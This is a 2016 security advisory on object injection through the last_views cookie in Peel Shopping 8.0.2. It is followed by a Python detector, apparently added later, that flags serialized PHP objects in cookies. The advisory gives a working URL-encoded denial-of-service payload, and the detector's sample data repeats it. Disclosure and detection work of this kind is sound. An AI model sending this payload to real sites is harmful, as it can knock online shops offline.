Peel Shopping 8.0.2 Object Injection

Credit: Tim Coen
Risk: Medium
Local: No
Remote: Yes

Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Peel Shopping 8.0.2
Fixed in:            8.0.3
Fixed Version Link:  
Vendor Website:      
Vulnerability Type:  Object Injection
Remote Exploitable:  Yes
Reported to vendor:  04/11/2016
Disclosed to public: 09/15/2016
Release mode:        Coordinated Release
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Overview

Peel Shopping is ecommerce software written in PHP. In version 8.0.2, it is vulnerable to Object Injection.

Peel Shopping stores a PHP object in a cookie, which is then unserialized when received by the application. An attacker can send arbitrary PHP objects and thus has a limited influence on the control flow of the application. This can for example lead to DOS attacks by creating an infinite loop.

3. Details

The last_views cookie is passed to unserialize, leading to Object Injection. Authentication is not required.

The impact of the vulnerability is difficult to estimate, as it may increase with the existence of further modules. Without any modules installed, it can at a minimum lead to DOS.

Proof of Concept:

GET /peel-shopping_8_0_2/achat/produit_details.php?id=1 HTTP/1.1
Host: localhost
Cookie: last_views=[INJECTED_OBJECT];

DOS Example:

The Smarty_Internal_Configfileparser class can be used to create an infinite loop.

GET /peel-shopping_8_0_2/achat/produit_details.php?id=1 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Cookie: last_views=%4f%3a%33%32%3a%22%53%6d%61%72%74%79%5f%49%6e%74%65%72%6e%61%6c%5f%43%6f%6e%66%69%67%66%69%6c%65%70%61%72%73%65%72%22%3a%33%3a%7b%73%3a%37%3a%22%79%79%73%74%61%63%6b%22%3b%4e%3b%73%3a%35%3a%22%79%79%69%64%78%22%3b%69%3a%31%3b%73%3a%31%31%3a%22%79%79%54%6f%6b%65%6e%4e%61%6d%65%22%3b%61%3a%30%3a%7b%7d%7d;
Connection: close

(Payload URL decoded: O:32:"Smarty_Internal_Configfileparser":3:{s:7:"yystack";N;s:5:"yyidx";i:1;s:11:"yyTokenName";a:0:{}})

4. Solution

To mitigate this issue please upgrade at least to version 8.0.3.

Please note that a newer version might already be available.

5. Report Timeline

04/11/2016 Informed Vendor about Issue
04/12/2016 Vendor announces release of fix before 05/11/2016
09/14/2016 Disclosed to public

Blog Reference:

--
blog:
tweet:
Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany
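The advisory describes the root cause as a cookie value handed straight to unserialize(). From the defender's side, the useful check is to know whether a cookie like last_views carries a serialized object at all, since the application only ever needs a plain array there. The following is an added example, not code from the Curesec advisory or from Peel Shopping: a small Python parser for PHP's serialize() format that walks a cookie value and returns every class name an unserialize() call would instantiate. Unlike a regex on O:<len>:", it is not fooled by the same bytes inside a string. The advisory's own URL-encoded payload is one test input; the other cookie values, the cookie-header samples and the session id in them are constructed for this example.

```python
"""Spot PHP serialized objects in cookies before they reach unserialize()."""
from __future__ import annotations

from urllib.parse import unquote


class PhpSerializedParser:
    """Recursive-descent parser for the serialize() type tags N, b, i, d, s, a, O.
    It records every class name an unserialize() call would instantiate."""

    def __init__(self, data: str) -> None:
        self.data = data                     # one character per byte (decoded as latin-1)
        self.pos = 0
        self.classes: list[str] = []

    def _read_until(self, ch: str) -> str:
        end = self.data.index(ch, self.pos)  # ValueError if the delimiter is missing
        token, self.pos = self.data[self.pos:end], end + 1
        return token

    def _expect(self, ch: str) -> None:
        if self.data[self.pos] != ch:        # IndexError if the input is truncated
            raise ValueError(f"expected {ch!r} at offset {self.pos}")
        self.pos += 1

    def _read_counted(self) -> str:
        """Read <len>:"<bytes>"; the length prefix makes embedded quotes harmless."""
        length = int(self._read_until(":"))
        self._expect('"')
        value = self.data[self.pos:self.pos + length]
        self.pos += length
        self._expect('"')
        return value

    def _read_pairs(self) -> dict:
        """Read <count>:{<key><value>...} for arrays and object properties."""
        count = int(self._read_until(":"))
        self._expect("{")
        pairs = {}
        for _ in range(count):
            key = self.parse_value()
            pairs[key] = self.parse_value()
        self._expect("}")
        return pairs

    def parse_value(self):
        tag = self.data[self.pos]
        self.pos += 1
        if tag == "N":                       # N;
            self._expect(";")
            return None
        self._expect(":")
        if tag in "bid":                     # b:1;  i:42;  d:1.5;
            raw = self._read_until(";")
            return {"b": lambda v: v == "1", "i": int, "d": float}[tag](raw)
        if tag == "s":                       # s:<len>:"<bytes>";
            value = self._read_counted()
            self._expect(";")
            return value
        if tag == "a":                       # a:<count>:{...}
            return self._read_pairs()
        if tag == "O":                       # O:<len>:"<class>":<count>:{...}
            class_name = self._read_counted()
            self._expect(":")
            self.classes.append(class_name)  # exactly what unserialize() would instantiate
            return {"__class": class_name, **self._read_pairs()}
        raise ValueError(f"unsupported type tag {tag!r}")


def object_classes_in_cookie(cookie_value: str) -> list[str]:
    """Class names a PHP unserialize() of this URL-encoded cookie would instantiate.
    latin-1 keeps one character per byte so the serialize() length prefixes line up.
    Non-serialized or truncated input returns whatever was seen before parsing failed."""
    parser = PhpSerializedParser(unquote(cookie_value, encoding="latin-1"))
    try:
        parser.parse_value()
    except (ValueError, IndexError):
        pass
    return parser.classes


def cookie_from_header(header: str, name: str) -> str | None:
    """Raw (still URL-encoded) value of one cookie in a Cookie header."""
    for part in header.split(";"):
        key, _, value = part.strip().partition("=")
        if key.strip() == name:
            return value.strip()
    return None


def scan_cookie_headers(samples: dict[str, str], cookie_name: str = "last_views") -> dict[str, list[str]]:
    """Label -> class names found in that cookie; a non-empty list is the alert condition."""
    findings: dict[str, list[str]] = {}
    for label, header in samples.items():
        raw = cookie_from_header(header, cookie_name)
        if raw is not None:
            findings[label] = object_classes_in_cookie(raw)
    return findings


# Constructed Cookie headers. advisory_poc carries the advisory's payload verbatim;
# the session id and every other value are made up for this example.
SAMPLE_COOKIE_HEADERS = {
    "advisory_poc": "PHPSESSID=constructed0000; last_views= %4f%3a%33%32%3a%22%53%6d%61%72%74%79%5f%49%6e%74%65%72%6e%61%6c%5f%43%6f%6e%66%69%67%66%69%6c%65%70%61%72%73%65%72%22%3a%33%3a%7b%73%3a%37%3a%22%79%79%73%74%61%63%6b%22%3b%4e%3b%73%3a%35%3a%22%79%79%69%64%78%22%3b%69%3a%31%3b%73%3a%31%31%3a%22%79%79%54%6f%6b%65%6e%4e%61%6d%65%22%3b%61%3a%30%3a%7b%7d%7d",
    "benign_array": "last_views=a%3A2%3A%7Bi%3A0%3Bi%3A12%3Bi%3A1%3Bi%3A7%3B%7D",   # a:2:{i:0;i:12;i:1;i:7;}
    "nested_object": "last_views=a%3A1%3A%7Bi%3A0%3BO%3A8%3A%22stdClass%22%3A0%3A%7B%7D%7D",  # object inside an array
    "string_lookalike": "last_views=s%3A12%3A%22hello%20O%3A1%3A%22x%22%3B",   # s:12:"hello O:1:"x"; no object
    "plain_list": "last_views=12%2C7",                                         # not serialized at all
}

if __name__ == "__main__":
    for label, classes in scan_cookie_headers(SAMPLE_COOKIE_HEADERS).items():
        print(f"{label:17} {'ALERT ' + ', '.join(classes) if classes else 'ok'}")
```

Run on the samples, only advisory_poc and nested_object produce a finding; the string that merely contains the text O:1:"x" does not, which is the reason to parse rather than grep. The same walk is what a request-logging hook or WAF rule would apply to every cookie the application later unserializes.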

